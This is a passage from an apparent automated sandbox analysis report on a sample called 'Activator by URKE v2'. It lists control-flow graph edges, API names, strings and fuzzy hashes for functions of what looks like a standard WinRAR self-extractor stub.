7ff7e5f14238-7ff7e5f1426f call 7ff7e5f1af0c call 7ff7e5ef12bc call 7ff7e5f10620 1549->1556 1557 7ff7e5f143ff-7ff7e5f14416 call 7ff7e5ef7c10 1549->1557 1553->1542 1553->1554 1554->1549 1587 7ff7e5f14271-7ff7e5f14284 1556->1587 1588 7ff7e5f142a4-7ff7e5f142ab 1556->1588 1565 7ff7e5f14418-7ff7e5f1443d call 7ff7e5ef1b70 call 7ff7e5f16e10 1557->1565 1566 7ff7e5f14441-7ff7e5f1459c call 7ff7e5ef1b70 SetEnvironmentVariableW GetLocalTime call 7ff7e5ef61e8 SetEnvironmentVariableW GetModuleHandleW LoadIconW call 7ff7e5f0eb64 call 7ff7e5ef9cac call 7ff7e5f0a430 * 2 DialogBoxParamW call 7ff7e5f0a524 * 2 1557->1566 1571 7ff7e5f146c9-7ff7e5f146da 1560->1571 1572 7ff7e5f14712-7ff7e5f14728 call 7ff7e5efbbf8 1560->1572 1565->1566 1685 7ff7e5f1459e SleepEx 1566->1685 1686 7ff7e5f145a4-7ff7e5f145ab 1566->1686 1577 7ff7e5f146f8-7ff7e5f1470b call 7ff7e5f15b1c 1571->1577 1578 7ff7e5f146dc-7ff7e5f146ef 1571->1578 1590 7ff7e5f1472a-7ff7e5f1473d 1572->1590 1591 7ff7e5f14775-7ff7e5f1477f 1572->1591 1577->1572 1585 7ff7e5f14964-7ff7e5f149b0 call 7ff7e5f1ae94 call 7ff7e5f15390 1578->1585 1586 7ff7e5f146f5 1578->1586 1632 7ff7e5f149b5-7ff7e5f149eb 1585->1632 1586->1577 1596 7ff7e5f1429f call 7ff7e5f15b1c 1587->1596 1597 7ff7e5f14286-7ff7e5f14299 1587->1597 1598 7ff7e5f142b1-7ff7e5f142cb OpenFileMappingW 1588->1598 1599 7ff7e5f14393-7ff7e5f143ca call 7ff7e5f1af0c call 7ff7e5ef12bc call 7ff7e5f13810 1588->1599 1600 7ff7e5f1475b-7ff7e5f1476e call 7ff7e5f15b1c 1590->1600 1601 7ff7e5f1473f-7ff7e5f14752 1590->1601 1602 7ff7e5f147cc-7ff7e5f147d6 1591->1602 1603 7ff7e5f14781-7ff7e5f14794 1591->1603 1596->1588 1597->1560 1597->1596 1610 7ff7e5f14388-7ff7e5f14391 CloseHandle 1598->1610 1611 7ff7e5f142d1-7ff7e5f142f1 MapViewOfFile 1598->1611 1599->1557 1663 7ff7e5f143cc-7ff7e5f143df 1599->1663 1600->1591 1601->1585 1612 7ff7e5f14758 1601->1612 1607 7ff7e5f147d8-7ff7e5f147eb 1602->1607 1608 7ff7e5f14823-7ff7e5f1482d 1602->1608 1614 7ff7e5f147b2-7ff7e5f147c5 call 7ff7e5f15b1c 1603->1614 1615 7ff7e5f14796-7ff7e5f147a9 1603->1615 1619 7ff7e5f14809-7ff7e5f1481c call 7ff7e5f15b1c 1607->1619 1620 7ff7e5f147ed-7ff7e5f14800 1607->1620 1623 7ff7e5f1487a-7ff7e5f14884 1608->1623 1624 7ff7e5f1482f-7ff7e5f14842 1608->1624 1610->1557 1611->1610 1622 7ff7e5f142f7-7ff7e5f14327 UnmapViewOfFile MapViewOfFile 1611->1622 1612->1600 1614->1602 1615->1585 1626 7ff7e5f147af 1615->1626 1619->1608 1620->1585 1633 7ff7e5f14806 1620->1633 1622->1610 1636 7ff7e5f14329-7ff7e5f14382 call 7ff7e5f0dd08 call 7ff7e5f13810 call 7ff7e5efbd30 call 7ff7e5efbe7c call 7ff7e5efbeec UnmapViewOfFile 1622->1636 1630 7ff7e5f148d1-7ff7e5f1495e call 7ff7e5ef1b70 * 10 1623->1630 1631 7ff7e5f14886-7ff7e5f14899 1623->1631 1637 7ff7e5f14860-7ff7e5f14873 call 7ff7e5f15b1c 1624->1637 1638 7ff7e5f14844-7ff7e5f14857 1624->1638 1626->1614 1630->1585 1640 7ff7e5f148b7-7ff7e5f148ca call 7ff7e5f15b1c 1631->1640 1641 7ff7e5f1489b-7ff7e5f148ae 1631->1641 1642 7ff7e5f149ed 1632->1642 1633->1619 1636->1610 1637->1623 1638->1585 1647 7ff7e5f1485d 1638->1647 1640->1630 1641->1585 1651 7ff7e5f148b4 1641->1651 1642->1642 1647->1637 1651->1640 1667 7ff7e5f143fa call 7ff7e5f15b1c 1663->1667 1668 7ff7e5f143e1-7ff7e5f143f4 1663->1668 1667->1557 1668->1667 1672 7ff7e5f1468f-7ff7e5f14694 call 7ff7e5f1ae94 1668->1672 1672->1542 1685->1686 1689 7ff7e5f145ad call 7ff7e5f0dac4 1686->1689 1690 7ff7e5f145b2-7ff7e5f145d5 call 7ff7e5efbc5c DeleteObject 1686->1690 1689->1690 1696 7ff7e5f145d7 DeleteObject 1690->1696 1697 7ff7e5f145dd-7ff7e5f145e4 1690->1697 1696->1697 1699 7ff7e5f14600-7ff7e5f14611 1697->1699 1700 7ff7e5f145e6-7ff7e5f145ed 1697->1700 1703 7ff7e5f14613-7ff7e5f1461f call 7ff7e5f13928 CloseHandle 1699->1703 1704 7ff7e5f14625-7ff7e5f14632 1699->1704 1700->1699 1702 7ff7e5f145ef-7ff7e5f145fb call 7ff7e5ef3ef4 1700->1702 1702->1699 1703->1704 1709 7ff7e5f14657-7ff7e5f1465c call 7ff7e5f0d120 1704->1709 1710 7ff7e5f14634-7ff7e5f14641 1704->1710 1716 7ff7e5f14661-7ff7e5f1468e call 7ff7e5f15c30 1709->1716 1714 7ff7e5f14651-7ff7e5f14653 1710->1714 1715 7ff7e5f14643-7ff7e5f1464b 1710->1715 1714->1709 1719 7ff7e5f14655 1714->1719 1715->1709 1718 7ff7e5f1464d-7ff7e5f1464f 1715->1718 1718->1709 1719->1709
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$EnvironmentHandleVariableView_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                                                                                                                                                                                                                                                  • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                                                                                                                                                  • API String ID: 3767324925-3710569615
                                                                                                                                                                                                                                                  • Opcode ID: 672bf953df9b2c0ed6fd5d6135e2b8bbf1eb438a14cfe977ab9df65a1aaea397
                                                                                                                                                                                                                                                  • Instruction ID: 3de28111497e955d369f7887310670cf07974fe67b33a0a4f0cdc6e0467b932d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 672bf953df9b2c0ed6fd5d6135e2b8bbf1eb438a14cfe977ab9df65a1aaea397
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E428461A1878A81EF10EB24D9643F9A365FF84F84FC04237DA9D8BA96DF3CD5508721
                                                                                                                                                                                                                                                  Function 00007FF7E5EFA8AC Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 250COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWideswprintf
                                                                                                                                                                                                                                                  • String ID: $%s:$CAPTION
                                                                                                                                                                                                                                                  • API String ID: 2100155373-404845831
                                                                                                                                                                                                                                                  • Opcode ID: 37b82379b4c8609f857ddfdd2aaec8a8c1c03398c79129c67daa6eff71331f07
                                                                                                                                                                                                                                                  • Instruction ID: 8ac5762fdd535b5dc5c78e2b42e7fed428c14077827cafa57c13c5d7bdae5020
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 37b82379b4c8609f857ddfdd2aaec8a8c1c03398c79129c67daa6eff71331f07
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9912B72B1864547E714EF29A8107AAA7A1F7C4B84FC44136EE8D9BB58CF3CE805CB10
                                                                                                                                                                                                                                                  Function 00007FF7E5F0C260 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 101memorywindowCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                                                                                                                                                                                                                                                  • String ID: PNG
                                                                                                                                                                                                                                                  • API String ID: 3656887471-364855578
                                                                                                                                                                                                                                                  • Opcode ID: 52838de665b1cfca97a252f31006ab2ca50257577933ff1d2f2095c083ed68dc
                                                                                                                                                                                                                                                  • Instruction ID: 496a63e348c9d712ef1bc999ccf0a21d9ea769ad9f93315b8e6de0907df1e108
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 52838de665b1cfca97a252f31006ab2ca50257577933ff1d2f2095c083ed68dc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0416265A1970A82EB14AB56E4643B9E3A0AF48F95F884436CE0DC7364EF7CE444C722
                                                                                                                                                                                                                                                  Function 00007FF7E5EF647C Relevance: 10.7, APIs: 7, Instructions: 153fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 2240 7ff7e5ef647c-7ff7e5ef64b3 2241 7ff7e5ef6592-7ff7e5ef659f FindNextFileW 2240->2241 2242 7ff7e5ef64b9-7ff7e5ef64c1 2240->2242 2245 7ff7e5ef65b3-7ff7e5ef65b6 2241->2245 2246 7ff7e5ef65a1-7ff7e5ef65b1 GetLastError 2241->2246 2243 7ff7e5ef64c6-7ff7e5ef64d8 FindFirstFileW 2242->2243 2244 7ff7e5ef64c3 2242->2244 2243->2245 2247 7ff7e5ef64de-7ff7e5ef6506 call 7ff7e5ef80b0 2243->2247 2244->2243 2249 7ff7e5ef65d1-7ff7e5ef6613 call 7ff7e5f1af0c call 7ff7e5ef12bc call 7ff7e5ef8dc4 2245->2249 2250 7ff7e5ef65b8-7ff7e5ef65c0 2245->2250 2248 7ff7e5ef658a-7ff7e5ef658d 2246->2248 2262 7ff7e5ef6527-7ff7e5ef6530 2247->2262 2263 7ff7e5ef6508-7ff7e5ef6524 FindFirstFileW 2247->2263 2251 7ff7e5ef66ab-7ff7e5ef66ce call 7ff7e5f15c30 2248->2251 2276 7ff7e5ef6615-7ff7e5ef662c 2249->2276 2277 7ff7e5ef664c-7ff7e5ef66a6 call 7ff7e5efe904 * 3 2249->2277 2253 7ff7e5ef65c5-7ff7e5ef65cc call 7ff7e5ef1c80 2250->2253 2254 7ff7e5ef65c2 2250->2254 2253->2249 2254->2253 2265 7ff7e5ef6532-7ff7e5ef6549 2262->2265 2266 7ff7e5ef6569-7ff7e5ef656d 2262->2266 2263->2262 2269 7ff7e5ef6564 call 7ff7e5f15b1c 2265->2269 2270 7ff7e5ef654b-7ff7e5ef655e 2265->2270 2266->2245 2268 7ff7e5ef656f-7ff7e5ef657e GetLastError 2266->2268 2274 7ff7e5ef6580-7ff7e5ef6586 2268->2274 2275 7ff7e5ef6588 2268->2275 2269->2266 2270->2269 2271 7ff7e5ef66d5-7ff7e5ef66db call 7ff7e5f1ae94 2270->2271 2274->2248 2274->2275 2275->2248 2279 7ff7e5ef662e-7ff7e5ef6641 2276->2279 2280 7ff7e5ef6647 call 7ff7e5f15b1c 2276->2280 2277->2251 2279->2280 2283 7ff7e5ef66cf-7ff7e5ef66d4 call 7ff7e5f1ae94 2279->2283 2280->2277 2283->2271
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 474548282-0
                                                                                                                                                                                                                                                  • Opcode ID: 9e2131fdd348412ea29fb79e3f45126eacfe5ffc882fb6d768e47b091ae13561
                                                                                                                                                                                                                                                  • Instruction ID: 343c78cd9cc14e4e857a7baa67d1cccfd3891254bbd1fc2e35c18409c16b6291
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e2131fdd348412ea29fb79e3f45126eacfe5ffc882fb6d768e47b091ae13561
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E461D962A0864A82DE10EB24E56037DA321FB84BA4FC04332EAFD876D9DF3CD554C721
                                                                                                                                                                                                                                                  Function 00007FF7E5F0569C Relevance: 1.6, Strings: 1, Instructions: 335COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: c
                                                                                                                                                                                                                                                  • API String ID: 0-112844655
                                                                                                                                                                                                                                                  • Opcode ID: eb4e912f9f88d7afe9849d570552e79721c9e35ced0c51bb9257986c74690234
                                                                                                                                                                                                                                                  • Instruction ID: 69192ae13809291de78ba364a0fa64e3d1e00a113f87b747b26568baf368917d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb4e912f9f88d7afe9849d570552e79721c9e35ced0c51bb9257986c74690234
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98E1C432A186598BEB14DF28D4903FDB7A1F788B49F58413ADA5993B88DF7CE440CB11
                                                                                                                                                                                                                                                  Function 00007FF7E5F06294 Relevance: .5, Instructions: 494COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 7eba8ca151026b65bdfa2c8b006b938faceaf61ace08357c0050e22ad0d56bec
                                                                                                                                                                                                                                                  • Instruction ID: e2c1004b594f7c3ee62ef0ddea47cdac08610610ba0c3e1a69a471de44e224d7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7eba8ca151026b65bdfa2c8b006b938faceaf61ace08357c0050e22ad0d56bec
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D122D162E0C65A82EA10AB1495703FDE291AF40F5CF9C0237EA5DD76D5DF3CE9009762
                                                                                                                                                                                                                                                  Function 00007FF7E5F15390 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 195libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 1724 7ff7e5f15390-7ff7e5f15419 call 7ff7e5f14fe8 1727 7ff7e5f1541b-7ff7e5f1543f call 7ff7e5f152f8 RaiseException 1724->1727 1728 7ff7e5f15444-7ff7e5f15461 1724->1728 1734 7ff7e5f15648-7ff7e5f15665 1727->1734 1730 7ff7e5f15463-7ff7e5f15474 1728->1730 1731 7ff7e5f15476-7ff7e5f1547a 1728->1731 1733 7ff7e5f1547d-7ff7e5f15489 1730->1733 1731->1733 1735 7ff7e5f154aa-7ff7e5f154ad 1733->1735 1736 7ff7e5f1548b-7ff7e5f1549d 1733->1736 1737 7ff7e5f154b3-7ff7e5f154b6 1735->1737 1738 7ff7e5f15554-7ff7e5f1555b 1735->1738 1748 7ff7e5f15619-7ff7e5f15623 1736->1748 1749 7ff7e5f154a3 1736->1749 1742 7ff7e5f154b8-7ff7e5f154cb 1737->1742 1743 7ff7e5f154cd-7ff7e5f154e2 LoadLibraryExA 1737->1743 1740 7ff7e5f1555d-7ff7e5f1556c 1738->1740 1741 7ff7e5f1556f-7ff7e5f15572 1738->1741 1740->1741 1744 7ff7e5f15578-7ff7e5f1557c 1741->1744 1745 7ff7e5f15615 1741->1745 1742->1743 1746 7ff7e5f15539-7ff7e5f15542 1742->1746 1743->1746 1747 7ff7e5f154e4-7ff7e5f154f7 GetLastError 1743->1747 1750 7ff7e5f155ab-7ff7e5f155be GetProcAddress 1744->1750 1751 7ff7e5f1557e-7ff7e5f15582 1744->1751 1745->1748 1756 7ff7e5f1554d 1746->1756 1757 7ff7e5f15544-7ff7e5f15547 FreeLibrary 1746->1757 1752 7ff7e5f154f9-7ff7e5f1550c 1747->1752 1753 7ff7e5f1550e-7ff7e5f15534 call 7ff7e5f152f8 RaiseException 1747->1753 1754 7ff7e5f15640 call 7ff7e5f152f8 1748->1754 1755 7ff7e5f15625-7ff7e5f15636 1748->1755 1749->1735 1750->1745 1763 7ff7e5f155c0-7ff7e5f155d3 GetLastError 1750->1763 1751->1750 1760 7ff7e5f15584-7ff7e5f1558f 1751->1760 1752->1746 1752->1753 1753->1734 1766 7ff7e5f15645 1754->1766 1755->1754 1756->1738 1757->1756 1760->1750 1764 7ff7e5f15591-7ff7e5f15598 1760->1764 1768 7ff7e5f155ea-7ff7e5f15611 call 7ff7e5f152f8 RaiseException call 7ff7e5f14fe8 1763->1768 1769 7ff7e5f155d5-7ff7e5f155e8 1763->1769 1764->1750 1770 7ff7e5f1559a-7ff7e5f1559f 1764->1770 1766->1734 1768->1745 1769->1745 1769->1768 1770->1750 1772 7ff7e5f155a1-7ff7e5f155a9 1770->1772 1772->1745 1772->1750
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DloadSection$AccessWrite$ExceptionProtectRaiseRelease$AcquireErrorLastLibraryLoad
                                                                                                                                                                                                                                                  • String ID: H
                                                                                                                                                                                                                                                  • API String ID: 282135826-2852464175
                                                                                                                                                                                                                                                  • Opcode ID: 1ba3ac7ad01aad9b5bbf5288423d8bdca45e536d0fe216ed71dd1fdc31554d99
                                                                                                                                                                                                                                                  • Instruction ID: a50ec0b2a86c6b84907b53f994e5877a86880c832a2931526593947305519e11
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ba3ac7ad01aad9b5bbf5288423d8bdca45e536d0fe216ed71dd1fdc31554d99
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9919D76A15B598AEB00EF61D9647ECB3A5BF08B89F844436DE0D87745EF38E404CB21
                                                                                                                                                                                                                                                  Function 00007FF7E5EF9CDC Relevance: 25.2, APIs: 3, Strings: 11, Instructions: 702COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5EF9254: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7E5EF9389
                                                                                                                                                                                                                                                  • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7E5EFA375
                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E5EFA82F
                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E5EFA835
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5F0033C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7E5EF9CBA), ref: 00007FF7E5F00369
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                                                                                                                                                                                                                                  • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                                                                                                                                                                                                                  • API String ID: 3629253777-3268106645
                                                                                                                                                                                                                                                  • Opcode ID: ff761b85f1b88144dcd8aa5d18c62a3cd5629ed2d1ff50a7d51e52782a648f9d
                                                                                                                                                                                                                                                  • Instruction ID: e5c4411429f6be3d27c7f3a686185b2e21fd82c46b7664f17ff0b1dab2e8fe42
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff761b85f1b88144dcd8aa5d18c62a3cd5629ed2d1ff50a7d51e52782a648f9d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9762C062A1864A81EB10EB24D6643BDB365FB40B84FC44133DA8D9F695EF3CE564C372
                                                                                                                                                                                                                                                  Function 00007FF7E5F13030 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 285windowCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

